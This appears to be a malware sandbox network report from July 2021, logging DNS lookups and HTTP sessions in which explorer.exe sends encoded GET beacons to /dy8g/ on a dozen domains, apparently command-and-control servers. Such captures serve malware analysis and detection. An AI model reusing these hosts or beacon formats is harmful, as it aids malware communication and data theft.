Jul 22, 2021 17:57:45.990206003 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:47.089982986 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:47.146457911 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:47.935260057 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:47.988466024 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:54.258121014 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:54.310722113 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:55.075237036 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:55.127279997 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:56.146461964 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:56.203408957 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:57.177795887 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:57.229603052 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:58.215534925 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:58.272744894 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:00.120146990 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:00.180008888 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:02.403296947 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:02.455421925 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:03.777609110 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:03.827518940 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:04.793417931 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:04.864845037 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:04.971244097 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:05.020303965 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:06.124804020 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:06.184788942 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:27.728662014 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:27.825376987 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:28.940677881 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:29.000389099 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:30.017081976 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:30.073992968 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:30.153373003 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:30.215703964 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:30.556526899 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:30.622924089 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:30.852163076 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:30.933320045 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:32.018532038 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:32.078849077 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:33.087373018 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:33.149784088 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:35.333154917 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:35.393279076 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:36.999396086 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:37.060000896 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:38.619467020 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:38.676644087 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:39.654539108 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:39.714941025 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:49.895446062 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:49.956135035 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:53.528120041 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:53.591170073 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:58:58.804101944 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:58:58.863302946 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:04.268095970 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:04.431778908 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:09.924380064 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:09.999142885 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:15.129786968 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:15.193748951 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:20.707901001 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:21.100776911 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:24.303745031 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:24.368860006 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:26.142884016 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:26.208291054 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:26.827694893 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:26.892404079 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:31.349689960 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:31.431299925 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:36.442914963 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:36.513633013 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:41.937380075 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:42.140947104 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:47.820266962 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:47.895555019 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:59:53.020230055 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:59:53.082292080 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:58:53.528120041 CEST | 192.168.2.4 | 8.8.8.8 | 0xa643 | Standard query (0) | www.fitnesstwentytwenty.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:58:58.804101944 CEST | 192.168.2.4 | 8.8.8.8 | 0x288f | Standard query (0) | www.melodezu.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:04.268095970 CEST | 192.168.2.4 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.sprinkleresources.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:09.924380064 CEST | 192.168.2.4 | 8.8.8.8 | 0x7f21 | Standard query (0) | www.professioneconsulenza.net | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:15.129786968 CEST | 192.168.2.4 | 8.8.8.8 | 0x14a9 | Standard query (0) | www.iwccgroup.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:20.707901001 CEST | 192.168.2.4 | 8.8.8.8 | 0x4733 | Standard query (0) | www.saludflv.info | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:26.142884016 CEST | 192.168.2.4 | 8.8.8.8 | 0x8bdf | Standard query (0) | www.manageoceanaccount.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:31.349689960 CEST | 192.168.2.4 | 8.8.8.8 | 0xf3f8 | Standard query (0) | www.cwdelrio.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:36.442914963 CEST | 192.168.2.4 | 8.8.8.8 | 0x1bf3 | Standard query (0) | www.mydreamtv.net | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:41.937380075 CEST | 192.168.2.4 | 8.8.8.8 | 0x7e22 | Standard query (0) | www.jorgeporcayo.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:47.820266962 CEST | 192.168.2.4 | 8.8.8.8 | 0xd2f9 | Standard query (0) | www.builtbydawn.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:53.020230055 CEST | 192.168.2.4 | 8.8.8.8 | 0xbf7 | Standard query (0) | www.invisiongc.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:58:53.591170073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa643 | No error (0) | www.fitnesstwentytwenty.com | fitnesstwentytwenty.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:58:53.591170073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa643 | No error (0) | fitnesstwentytwenty.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:58:58.863302946 CEST | 8.8.8.8 | 192.168.2.4 | 0x288f | No error (0) | www.melodezu.com | melodezu.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:58:58.863302946 CEST | 8.8.8.8 | 192.168.2.4 | 0x288f | No error (0) | melodezu.com |  | 64.227.87.162 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:04.431778908 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfe0 | No error (0) | www.sprinkleresources.com | sprinkleresources.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:59:04.431778908 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfe0 | No error (0) | sprinkleresources.com |  | 78.47.57.7 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:09.999142885 CEST | 8.8.8.8 | 192.168.2.4 | 0x7f21 | No error (0) | www.professioneconsulenza.net |  | 89.46.109.25 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:15.193748951 CEST | 8.8.8.8 | 192.168.2.4 | 0x14a9 | No error (0) | www.iwccgroup.com |  | 104.21.86.209 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:15.193748951 CEST | 8.8.8.8 | 192.168.2.4 | 0x14a9 | No error (0) | www.iwccgroup.com |  | 172.67.136.222 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:21.100776911 CEST | 8.8.8.8 | 192.168.2.4 | 0x4733 | Server failure (2) | www.saludflv.info | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:26.208291054 CEST | 8.8.8.8 | 192.168.2.4 | 0x8bdf | No error (0) | www.manageoceanaccount.com |  | 104.21.40.211 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:26.208291054 CEST | 8.8.8.8 | 192.168.2.4 | 0x8bdf | No error (0) | www.manageoceanaccount.com |  | 172.67.188.96 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:31.431299925 CEST | 8.8.8.8 | 192.168.2.4 | 0xf3f8 | Name error (3) | www.cwdelrio.com | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:36.513633013 CEST | 8.8.8.8 | 192.168.2.4 | 0x1bf3 | Name error (3) | www.mydreamtv.net | none | none | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:42.140947104 CEST | 8.8.8.8 | 192.168.2.4 | 0x7e22 | No error (0) | www.jorgeporcayo.com | jorgeporcayo.com |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:59:42.140947104 CEST | 8.8.8.8 | 192.168.2.4 | 0x7e22 | No error (0) | jorgeporcayo.com |  | 162.241.62.54 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:47.895555019 CEST | 8.8.8.8 | 192.168.2.4 | 0xd2f9 | No error (0) | www.builtbydawn.com |  | 172.67.129.33 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:47.895555019 CEST | 8.8.8.8 | 192.168.2.4 | 0xd2f9 | No error (0) | www.builtbydawn.com |  | 104.21.2.115 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:59:53.082292080 CEST | 8.8.8.8 | 192.168.2.4 | 0xbf7 | No error (0) | www.invisiongc.net | invisiongc.net |  | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 17:59:53.082292080 CEST | 8.8.8.8 | 192.168.2.4 | 0xbf7 | No error (0) | invisiongc.net |  | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.fitnesstwentytwenty.com
• www.melodezu.com
• www.sprinkleresources.com
• www.professioneconsulenza.net
• www.iwccgroup.com
• www.manageoceanaccount.com
• www.jorgeporcayo.com
• www.builtbydawn.com
• www.invisiongc.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49760 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:58:53.644109964 CEST | 8106 | OUT | GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1
Host: www.fitnesstwentytwenty.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:58:53.783077955 CEST | 8107 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 22 Jul 2021 15:58:53 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60ef677e-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49761 | 64.227.87.162 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:58:59.060558081 CEST | 8108 | OUT | GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1
Host: www.melodezu.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:58:59.252990961 CEST | 8109 | IN | HTTP/1.1 404 Not Found
Date: Thu, 22 Jul 2021 15:58:59 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 278
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49762 | 78.47.57.7 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:59:04.504060984 CEST | 8110 | OUT | GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1
Host: www.sprinkleresources.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:59:04.887867928 CEST | 8110 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 22 Jul 2021 15:59:04 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49763 | 89.46.109.25 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 17:59:10.061862946 CEST | 8111 | OUT | GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1
Host: www.professioneconsulenza.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 17:59:10.122562885 CEST | 8112 | IN | HTTP/1.1 301 Moved Permanently
Server: aruba-proxy
Date: Thu, 22 Jul 2021 15:59:10 GMT
Content-Type: text/html
Content-Length: 168
Connection: close
Location: https://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw
X-ServerName: ipvsproxy177.ad.aruba.it
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>


                                                                Session ID: 4 | Source: 192.168.2.4:49764 | Destination: 104.21.86.209:80 | Process: C:\Windows\explorer.exe
                                                                Jul 22, 2021 17:59:15.237628937 CEST | 8113 kB transferred | OUT | GET /dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.iwccgroup.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:15.681235075 CEST | 8114 kB transferred | IN | HTTP/1.1 404 Not Found
                                                                Date: Thu, 22 Jul 2021 15:59:15 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Last-Modified: Wed, 17 Mar 2021 11:02:44 GMT
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aYGn2VEN7wNFB%2BssKDmUplNRL10Cnzm6Ply0dK5FRfCgz5iFtoVNECzO9P%2FVSq3nQ78mZwjTNHso5RXhTIBLuQydQrnYDJQaxNDkUofb5UxvvUTbjFk9fUuiHEaG3iwZvc0OLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 672de0086c212c2a-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 62 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 6f 70 7b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 34 30 25 20 2d 20 31 34 30 70 78 29 7d 2e 62 6f 74 74 6f 6d 7b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 36 30 25 20 2d 20 32 31 30 70 78 29 7d 2e 63 65 6e 74 65 72 7b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 7d 2e 63 69 72 63 6c 65 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 32 36 30 70 78 3b 68 65 69 67 68 74 3a 32 36 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 30 63 36 63 63 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 63 6f 6c 6f 72 3a 23 35 30 35 61 36 34 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 5f 74 65 78 74 
22 3e 34 30 34 3c
                                                                Data Ascii: b98<!DOCTYPE html><html><head><meta charset="utf-8"><style>html{height:100%}body{margin:0 auto;min-height:600px;min-width:800px;height:100%}.top{height:100px;height:calc(40% - 140px)}.bottom{height:150px;height:calc(60% - 210px)}.center{height:350px;text-align:center;vertical-align:middle;font-family:Verdana}.circle{margin:auto;width:260px;height:260px;border-radius:50%;background:#c0c6cc}.circle_text{line-height:260px;font-size:100px;color:#ffffff;font-weight:bold}.text{line-height:40px;font-size:26px;color:#505a64}</style></head><body><div class="top"></div><div class="center"><div class="circle"><div class="circle_text">404<


                                                                Session ID: 5 | Source: 192.168.2.4:49766 | Destination: 104.21.40.211:80 | Process: C:\Windows\explorer.exe
                                                                Jul 22, 2021 17:59:26.254539013 CEST | 8127 kB transferred | OUT | GET /dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.manageoceanaccount.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:26.328947067 CEST | 8128 kB transferred | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 22 Jul 2021 15:59:26 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                location: https://accountsredapple.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JbKm5i2SCek9R7xmGZATyiecYj9toFFTWwAdJ2uHYmgn7v6rtQwrNmxvRFTprayFO0Y34EXqjPlZaUrfmcLd3JX0muKshErPWsD3Kh4oPFrZdRqY%2FKX6KJ1vQWzyUm0zcllUKvO5lYMFHwT%2FKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 672de04d4ac74db8-FRA
